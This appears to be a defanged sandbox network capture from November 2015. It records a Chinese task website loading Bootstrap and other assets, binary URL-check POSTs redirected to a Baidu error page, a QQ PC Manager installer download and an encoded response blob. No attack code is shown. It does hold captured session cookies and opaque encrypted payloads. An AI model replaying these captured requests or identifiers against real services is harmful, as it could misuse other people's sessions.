@font-face{font-family:'iconfont';src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot');src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot?#iefix') format('embedded-opentype'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.woff') format('woff'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.ttf') format('truetype'),url('http://at.alicdn.com/t/font_1415073294_4967172.svg#iconfont') format('svg');}.iconfont{position:relative;top:1px;display:inline-block;font-weight:normal;line-height:1;font-family:"iconfont" !important;font-style:normal;-webkit-font-smoothing:antialiased;-webkit-text-stroke-width:0.2px;-moz-osx-font-smoothing:grayscale;}.iconfont:empty{width:1em;}.icon-tsina:before{content:"\1111";}.icon-tqq:before{content:"\5555";}.icon-weixin:before{content:"\e607";}.icon-qq:before{content:"\7777";}.icon-qzone:before{content:"\9999";}.icon-top:before{content:"\4444";}.icon-dingyue:before{content:"\2222";}.icon-github:before{content:"\3333";}.icon-ma:before{content:"\6666";}.icon-yuedu:before{content:"\8888";}.icon-biaoqing:before{content:"\e600";}.icon-chuangshiren:before{content:"\e602";}.icon-guanliyuan:before{content:"\e601";}.icon-fenxiang:before{content:"\e603";}.icon-qz:before{content:"\e604";}.icon-addgroup:before{content:"\e605";}.icon-qunzu:before{content:"\e606";}.icon-tuijian:before{content:"\e608";}.icon-discover:before{content:"\e60a";}.icon-website:before{content:"\e60c";}.icon-audit:before{content:"\e612";}.icon-music:before{content:"\e60e";}.icon-video:before{content:"

<<< skipped >>>

POST /query?cmd=validurl HTTP/1.1

Content-Length: 117

Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:05 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00058821140271667466110713

Server: Apache

tracecode: 00058821140271667466110713

Set-Cookie: BAIDUID=DC3B4452E5376F0DF4258E7C406A2A02:FG=1; expires=Sun, 06-Nov-16 05:00:05 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 123

Connection: Keep-Alive

.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999935041911494410110712

Server: Apache

tracecode: 35999935041911494410110712

Set-Cookie: BAIDUID=005B09C6D83A1A4BFBF5A997083E266E:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /?89-sd--ant- HTTP/1.1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:49 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Set-Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065; expires=Sat, 07-Nov-2015 05:59:49 GMT; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Pragma: no-cache

Cache-control: private

X-Powered-By: ThinkPHP

2218..<!DOCTYPE html>..<html lang="zh-cn">..<head>..<meta charset="utf-8">..<meta http-equiv="X-UA-Compatible" content="IE=edge">..<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">..<meta name="renderer" content="webkit">..<title>.................._...1..._.........</title>..<meta name="keywords" content="" />..<meta name="description" content="" />..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />..<link rel="stylesheet" type="text/css" href="hXXp://cdn.daicuo.cc/dc.base/1.0.3/css/base.min.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/View/Home/Task/css.base.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/View/Home/Task/css.task.css?1.0.247" />....<script>var dc={root:"/",domain:"VVV.xieshouz.com",id:"",page:"1",userid:"",username:"",'lazyload':""};</script>..</head>..<body>..<nav class="navbar navbar-inverse" role="navigation">.. <div class="container">.. <div class="row"><div class="col-md-12 col-md-offset-0">.. <div class="navbar-header">.. <butto

<<< skipped >>>

GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:49 GMT

Content-Type: text/css

Content-Length: 122543

Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "561be981-1deaf"

Expires: Sat, 07 Nov 2015 16:59:49 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

/*!.. * Bootstrap v3.3.5 (hXXp://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (hXXps://github.com/twbs/bootstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;borde

<<< skipped >>>

GET /Public/respond/1.4.2/respond.min.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:53 GMT

Content-Type: application/javascript

Content-Length: 4381

Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "550478a6-111d"

Expires: Sat, 07 Nov 2015 16:59:53 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

/*! Respond.js v1.4.2: min/max-width media query polyfill * Copyright 2013 Scott Jehl.. * Licensed under hXXps://github.com/scottjehl/Respond/blob/master/LICENSE-MIT.. * */..!function(a){"use strict";a.matchMedia=a.matchMedia||function(a){var b,c=a.documentElement,d=c.firstElementChild||c.firstChild,e=a.createElement("body"),f=a.createElement("div");return f.id="mq-test-1",f.style.cssText="position:absolute;top:-100em",e.style.background="none",e.appendChild(f),function(a){return f.innerHTML='<style media="' a '"> #mq-test-1 { width: 42px; }</style>',c.insertBefore(e,d),b=42===f.offsetWidth,c.removeChild(e),{matches:b,media:a}}}(a.document)}(this),function(a){"use strict";function b(){u(!0)}var c={};a.respond=c,c.update=function(){};var d=[],e=function(){var b=!1;try{b=new a.XMLHttpRequest}catch(c){b=new a.ActiveXObject("Microsoft.XMLHTTP")}return function(){return b}}(),f=function(a,b){var c=e();c&&(c.open("GET",a,!0),c.onreadystatechange=function(){4!==c.readyState||200!==c.status&&304!==c.status||b(c.responseText)},4!==c.readyState&&c.send(null))};if(c.ajax=f,c.queue=d,c.regex={media:/@media[^\{] \{([^\{\}]*\{[^\}\{]*\}) /gi,keyframes:/@(?:\-(?:o|moz|webkit)\-)?keyframes[^\{] \{(?:[^\{\}]*\{[^\}\{]*\}) [^\}]*\}/gi,urls:/(url$)['"]?([^\/$'"][^:\)'"] )['"]?(\))/g,findStyles:/@media *([^\{] )\{([\S\s] ?)$/,only:/(only\s )?([a-zA-Z] )\s?/,minw:/$[\s]*min\-width\s*:[\s]*([\s]*[0-9\.] )(px|em)[\s]*$/,maxw:/$[\s]*max\-width\s*:[\s]*([\s]*[0-9\.] )(px|em)[\s]*$/},c.mediaQueriesSupported=a.mat

<<< skipped >>>

GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:53 GMT

Content-Type: text/css

Content-Length: 122543

Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "561be981-1deaf"

Expires: Sat, 07 Nov 2015 16:59:53 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

<<< skipped >>>

GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:55 GMT

Content-Type: text/css

Content-Length: 4860

Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "56246855-12fc"

Expires: Sat, 07 Nov 2015 16:59:55 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

html,body {.. overflow-x: hidden;..}..body {.. background: #ebebeb;.. position: relative;...font-family: "Helvetica Neue","Microsoft YaHei","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{.. color: #333;..}..a:hover,a:focus {.. color: #f60;.. text-decoration: none;..}..a:focus {.. outline: thin dotted;.. outline: 5px auto -webkit-focus-ring-color;.. outline-offset: -2px;..}../*bootstrap fieldset*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap nav*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...navbar-inverse .navbar-nav>li>a{.. color: #fff;..}...navbar-inverse .navbar-nav>li>a:hover{.. color: #999;..}...navbar-inverse .navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>a:focus,...navbar-inverse .navbar-nav>.active>a:hover{.. color: #ddd;.. background-color:#080808;..}...navbar-collapse{...font-size: 1.1em;..}../*bootstrap page*/...pagination > li > a,...pagination > li > span {.. position: relative;.. float: left;.. padding: 6px 12px;.. margin: 0px 5px;.. line-height: 1.45;.. color: #222;.. text-decoration: none;.. background-color: #fff;.. border: 1px solid #ddd;..}...pagination > li.disabled > a{.. font-weight: bold;...}...pagination > li > a:hover,...pagination > li > span:hover,...pagination > li > a:focus,...pagination > li > span:focus {.. color: #2cab93;.. background-color: #eee;..

<<< skipped >>>

GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:55 GMT

Content-Type: text/css

Content-Length: 2042

Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "5624957b-7fa"

Expires: Sat, 07 Nov 2015 16:59:55 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

/*task inc*/..h4,h4 a{.. color: #F60;..}..h4 a:hover{.. color: #333;..}../*channel/list/tag*/...dc-item li{.. margin-bottom: 20px;.. overflow: hidden;..}...dc-item p{ .. line-height: 2.0;..}...dc-item p.lead{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.lead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...margin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}...dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.dc-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;.. margin-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidden;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-size:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margin:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{...font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal;..}...dc-task-pad{...padding:40px 0;..}...dc-content{.. margin-bottom: 15px;...font-size: 1.2em;.. line-height: 1.8em;...color: #555;...overflow: hidden;..}...dc-content a{.. color: #f60;..}...dc-content a:hover{.. color: #333;..}...dc-content .nav-tabs{.. margin-top:15px;..}...dc-content .tab-content{.. padding-top: 15px;..}...dc-content .apply{.. padding:20px 0;.. text-align: center;..}...dc-content .dc-image{...margin:0 auto;..}...dc-content table td{.. padding-left: 10px;..}...dc-content pre {...border-radius: 0;.. margin: 1.64em 0;..

<<< skipped >>>

GET /Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:57 GMT

Content-Type: application/javascript

Content-Length: 36816

Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "557f7832-8fd0"

Expires: Sat, 07 Nov 2015 16:59:57 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

/*!. * Bootstrap v3.3.5 (hXXp://getbootstrap.com). * Copyright 2011-2015 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery"); function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQuery), function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){return a(b.target).is(this)?b.handleObj.handler.apply(this,arguments):void 0}})})}(jQuery), function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.5",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigge

<<< skipped >>>

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 123

Connection: Keep-Alive

.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991274551213477898110712

Server: Apache

tracecode: 35991274551213477898110712

Set-Cookie: BAIDUID=005B09C6D83A1A4BCA2EF032D9175BBE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 117

Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016551091911494410110713

Server: Apache

tracecode: 00016551091911494410110713

Set-Cookie: BAIDUID=69DAC83DF6D595A311E23693EE9228DF:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 123

Connection: Keep-Alive

.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008213770658453514110713

Server: Apache

tracecode: 00008213770658453514110713

Set-Cookie: BAIDUID=32F3C5706F8B24028AF7668DD8FF2F78:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /commit?cmd=finfo HTTP/1.1

Content-Length: 543

Connection: Keep-Alive

.#4H........................................!#$%&"k." ,-.

3234!~:9:;.i.=@ABK..DGHIBKLMOOPQ.STU_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m.............&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."..4t..S...0.@E..Jpz...-...H.;^}..Y....

.M.......

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:13 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00137261760315632138110713

Server: Apache

tracecode: 00137261760315632138110713

Set-Cookie: BAIDUID=67699F784E2A0D23D0594A86343DB7B0:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 96

Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:10 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00101112390271667466110713

Server: Apache

tracecode: 00101112390271667466110713

Set-Cookie: BAIDUID=BA43C3B59B01A15F5DD3D9CDD70F255F:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)

Host: dlied6.qq.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 302 Found

Server: nws 1.2.15

Connection: close

Date: Sat, 07 Nov 2015 05:00:16 GMT

Expires: Sat, 07 Nov 2015 05:00:16 GMT

Cache-Control: max-age=0

Content-Length: 89

Location: hXXp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe

The actual URL is '/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe'...

POST /query?cmd=validurl HTTP/1.1

Content-Length: 125

Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:02 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024935640818948618110713

Server: Apache

tracecode: 00024935640818948618110713

Set-Cookie: BAIDUID=B2053B857F2258D2E04896EB7F862B42:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)

Host: c.pc.qq.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:15 GMT

Server: HTTP Load Balancer/2.0

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

Content-Length: 672

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/octet-stream

Cache-Control: no-cache

Pragma: no-cache

9 pYvSlibR11BBHT94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihktDkjBh41ybhkE A/W QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX mlyOKd4C7W/vxy330jna us6KFWIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0muXpsiZuySxm5Wh6cwBxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQheKnfk2DFlZTRBhcBWHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4QoeIR1MCS1aFzbmqfyFWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2Ss6wZfJIGJ5kkNsbpkw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWvToloip OFdM7c2MsfWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZPEHWBjsAwZ7C4BpbNAwzEiZOeQ64AqfWW4KoaGYH7H49zIVSkhD9CP8GV2fHUnI1sX BptP6c6PW5IEkjTob5lyfr/oyNgpdc4lJ4md9NfI0LdgPHTTP/1.1 200 OK..Date: Sat, 07 Nov 2015 05:00:15 GMT..Server: HTTP Load Balancer/2.0..Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT..Content-Length: 672..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: application/octet-stream..Cache-Control: no-cache..Pragma: no-cache..9 pYvSlibR11BBHT94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihktDkjBh41ybhkE A/W QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX mlyOKd4C7W/vxy330jna us6KFWIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0muXpsiZuySxm5Wh6cwBxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQheKnfk2DFlZTRBhcBWHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4QoeIR1MCS1aFzbmqfyFWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2Ss6wZfJIGJ5kkNsbpkw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWvToloip OFdM7c2MsfWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZPEHWBjsAwZ7C

<<< skipped >>>

GET /17476535.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: js.users.51.la

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: max-age=300

Content-Length: 1862

Content-Type: application/x-javascript

Last-Modified: Fri, 07 Aug 2015 04:22:10 GMT

Accept-Ranges: bytes

ETag: "cc562aa1c8d0d01:339f"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 07 Nov 2015 04:44:38 GMT

Connection: close

<<< skipped >>>

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 102

Connection: Keep-Alive

.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008958911911494410110713

Server: Apache

tracecode: 00008958911911494410110713

Set-Cookie: BAIDUID=32F3C5706F8B2402BD0EB1E10803435C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 114

Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ

..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:03 GMT

Content-Type: text/html

